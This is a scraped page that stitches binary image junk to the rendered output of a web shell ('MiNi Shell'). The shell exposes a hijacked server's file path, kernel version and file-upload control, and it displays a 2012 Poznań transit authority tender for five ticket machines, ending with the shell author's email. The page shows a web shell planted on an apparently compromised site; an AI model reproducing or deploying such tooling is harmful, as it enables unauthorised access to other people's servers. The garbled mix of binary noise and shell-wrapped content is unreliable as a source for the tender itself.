JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120130/24829-N-2012.html

<p class="kh_header"><b>Poznań: Budowa systemu 5 stacjonarnych automatów biletowych</b><br>
<b>Numer ogłoszenia: 24829 - 2012; data zamieszczenia: 30.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Transportu Miejskiego w Poznaniu , ul. Matejki 59, 60-770 Poznań, woj. wielkopolskie, tel. 61 834 6146, faks 61 834 61 47.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ztm.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa systemu 5 stacjonarnych automatów biletowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 - dostawa 5 sztuk automatów biletowych w wskazanych punktach Miasta Poznania.
Zadanie 2 - montaż, wykonanie przyłącza elektrycznego i podłączenia 5 sztuk automatów biletowych w wskazanych punktach Miasta Poznania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.93.30.00-5, 30.14.42.00-2, 79.63.20.00-3, 48.42.10.00-5, 45.22.38.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że wykonał 3 dostawy min. 5 automatów biletowych stacjonarnych, każda dostawa na kwotę co najmniej 500.000,00 zł (zamiennie 1 dostawa minimum 15 automatów biletowych na łączną kwotę min. 1.500.000,00 pln.), w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością dostawą stanowiącym przedmiot zamówienia oraz przedłoży dokumenty na podstawie których wykaże spełnienie niniejszego warunku;
Wykonawca winien przedłożyć oświadczenie, że spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych;
Wykonawca winien wykazać wykonanie jednej roboty polegającej na montażu, wykonaniu przyłącza elektrycznego i podłączenia co najmniej 5 automatów biletowych, w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Warunki gwarancji obejmujący okresy gwarancji i jej zakres;
2. Do oferty wykonawca winien załączyć specyfikacje techniczną oferowanych automatów biletowych, która winna zawierać następujące elementy:
a)	Rysunki ofertowe z wymiarami zewnętrznymi i masą urządzenia;
b)	Rysunki fundamentu i schematy podłączenia do sieci zasilającej, umożliwiające uzyskanie pozwolenia na budowę przyłącza energetycznego, zgodnie z obowiązującym prawem budowlanym;
c)	Parametry techniczne ekranu, czytnika monet, czytnika banknotów, drukarki termicznej, procesora sterującego pracą automatu, interfejsu wymiany danych itp.
d)	Wymiary zewnętrzne i opis wykonania obudowy z podaniem stosowanych materiałów;
e)	Opis funkcji realizowanych przez automat z uwzględnieniem informacji pasażerskiej;
f)	Parametry pracy urządzenia;
g)	Pobór energii w poszczególnych trybach pracy;
h)	Wielkość pakietu wysyłanego za pośrednictwem sieci UMTS do centrum obsługi;
i)	Kopie świadectwa bezpieczeństwa CE wymagane prawem polskim;
j)	Opis obiegu bilonu i banknotów podczas transakcji;
k)	Opis zabezpieczeń stosowanych w automacie;
l)	Opis funkcji oprogramowania sterującego;
m)	Opis funkcji oprogramowania serwisowego w tym pliku konfiguracyjnego;
n)	Opis funkcji oprogramowania umożliwiającego zdalny monitoring stanu technicznego automatów;
3. Wypełniony formularz ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Parametry techniczne - 40</li>
<li>3 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zadanie 1
Zamawiający na podstawie art. 144 dopuści zmianę umowy dotyczącą przedmiotu zamówienia w następujących przypadkach:
1)	ograniczenia przez Zamawiającego zakresu umowy z przyczyn, jakich nie można było przewidzieć w chwili zawierania umowy,
2)	braku możliwości dotrzymania przez Wykonawcę terminu wykonania przedmiotu umowy z przyczyn od niego niezależnych, jakich nie mógł on przewidzieć w chwili zawierania umowy,
3)	zmiany rachunku bankowego, adresu, osób reprezentujących Strony, lub oznaczenia Stron umowy, wynikających ze zmiany stanu faktycznego lub prawnego,
4)	zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
5)	zmiany w zakresie i formie przedmiotu umowy, jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany obowiązujących przepisów prawa.
Zadanie 2
Zamawiający na podstawie art. 144 dopuści zmianę umowy dotyczącą przedmiotu zamówienia w następujących przypadkach:
1)	ograniczenia przez Zamawiającego zakresu umowy z przyczyn, jakich nie można było przewidzieć w chwili zawierania umowy,
2)	braku możliwości dotrzymania przez Wykonawcę terminu wykonania przedmiotu umowy z przyczyn od niego niezależnych, jakich nie mógł on przewidzieć w chwili zawierania umowy,
3)	zmiany rachunku bankowego, adresu, osób reprezentujących Strony, lub oznaczenia Stron umowy, wynikających ze zmiany stanu faktycznego lub prawnego,
4)	zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
zmiany w zakresie i formie przedmiotu umowy, jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany obowiązujących przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztm.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZTM w Poznaniu, ul. Matejki 59, 60-770 Poznań, pok. 319.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2012 godzina 10:00, miejsce: ZTM w Poznaniu, ul. Matejki 59, 60-770 Poznań, pok. 319.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - dostawa 5 sztuk automatów biletowych w wskazanych punktach Miasta Poznania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach realizacji przedmiotu zamówienia, określonego Dostawca zobowiązany jest:
1.	dostarczyć 5 stacjonarnych automatów biletowych do siedziby Zamawiającego, 
2.	zaprogramować automaty w taryfę aktualną na dzień montażu;
3.	dostarczyć:
a)	niezbędne narzędzia specjalistyczne, których nie posiada Zamawiający;
b)	oprogramowanie w języku polskim niezbędne do eksploatacji i obsługi technicznej stacjonarnych automatów biletowych;
c)	niezbędną dokumentację techniczno - eksploatacyjną w języku polskim;
d)	wyposażenie dodatkowe w postaci 2 kaset na monety (magazyn początkowy), 2 kaset na banknoty; 3 kaset końcowych na bilon
4.	zorganizować i wyposażyć centrum obsługi w siedzibie Zamawiającego zdalnie monitorujące stan techniczny automatów, o ile niemożliwe byłoby wpięcie nowych automatów do eksploatowanego przez Zamawiającego systemu nadzoru;
5.	zorganizować stanowisko testowe umożliwiające Zamawiającemu: sprawdzenie działania poszczególnych komponentów oraz przeprowadzenie testów zmienionego oprogramowania przed załadowaniem go do automatów rozmieszczonych w wyznaczonych punktach na terenie miasta Poznania, o ile niemożliwe byłoby wpięcie nowych automatów do eksploatowanego przez Zamawiającego systemu nadzoru;
6.	przeszkolić 10 pracowników Zamawiającego w zakresie obsługi automatów, w tym:
a)	2 pracowników programujących maski ekranów i taryfy;
b)	2 pracowników prowadzących statystykę sprzedaży;
c)	2 pracowników centrum obsługi;
d)	4 pracowników serwisowych prowadzących wymianę papieru, magazynów początkowych, kaset końcowych i konserwację automatów, o ile niemożliwe byłoby wpięcie nowych automatów do eksploatowanego przez  Zamawiającego systemu nadzoru.
7.	zintegrować dostarczone automaty biletowe z systemem automatów posiadanych i użytkowanych przez Zamawiającego. Jeżeli dostarczony przez Zamawiającego system będzie kompatybilny z systemem posiadanym przez Zamawiającego, to Zamawiający we własnym zakresie uruchomi i zintegruje z istniejącą siecią 5 dostarczonych automatów biletowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.93.30.00-5, 30.14.42.00-2, 79.63.20.00-3, 48.42.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Parametry techniczne - 40</li>
<li>3. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - montaż, wykonanie przyłącza elektrycznego i podłączenia 5 sztuk automatów biletowych w wskazanych punktach Miasta Poznania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach prac montażowych Wykonawca zobowiązany jest wykonać następujące prace:
1.	wykonać i zamontować betonowe zbrojone fundamenty pod automaty biletowe i trwale związać je z podłożem. 
2.	wykonać i zamontować betonowe fundamenty pod rozdzielcze skrzynki elektrycznej
3.	ustawić automaty biletowe na uprzednio wykonanych fundamentach betonowych i trwale połączyć je z fundamentami za pomocą kotw fundamentowych tak, aby nie można ich było zdemontować bez otwierania automatów, 
4.	dostarczyć i zamontować na uprzednio wykonanych przez siebie fundamentach betonowych skrzynki elektryczne,
5.	dokonać wszelkich uzgodnień związanych z montażem automatów biletowych z Zakładem Energetycznym,
6.	dostarczyć elektryczną dokumentację powykonawczą w postaci schematów elektrycznych i dokumentację pomiarów elektrycznych,
7.	zamontować wszystkie automaty biletowe w odległości nie większej niż 8-10 m od źródła zasilania; źródła zasilania automatów biletowych w załączonej tabeli specyfikacji automatów biletowych. W przypadku poboru zasilania ze skrzynek rozdzielczej sygnalizacji świetlnej - zaciski przewodów zasilających podłączyć przed sterownikiem sygnalizacji świetlnej. 
9.	wykonać wszelkie prace ziemne tak, żeby podłoża pod instalacjami elektrycznymi pozostawić w stanie nie pogorszonym; szczególnie dotyczy to podłoży z ułożoną uprzednio nawierzchnią utwardzoną albo wyłożoną pozbrukiem lub innymi płytkami chodnikowymi. Ubytki w podłożu uzupełnić materiałem takim jaki użyto w stanie pierwotnym lub podobnym.
10.	wszelkie prace wykonać zgodnie ze sztuką inżynierską i z zachowaniem wszelkich przepisów stosownych do tego typu prac i z zachowaniem BHP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.38.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com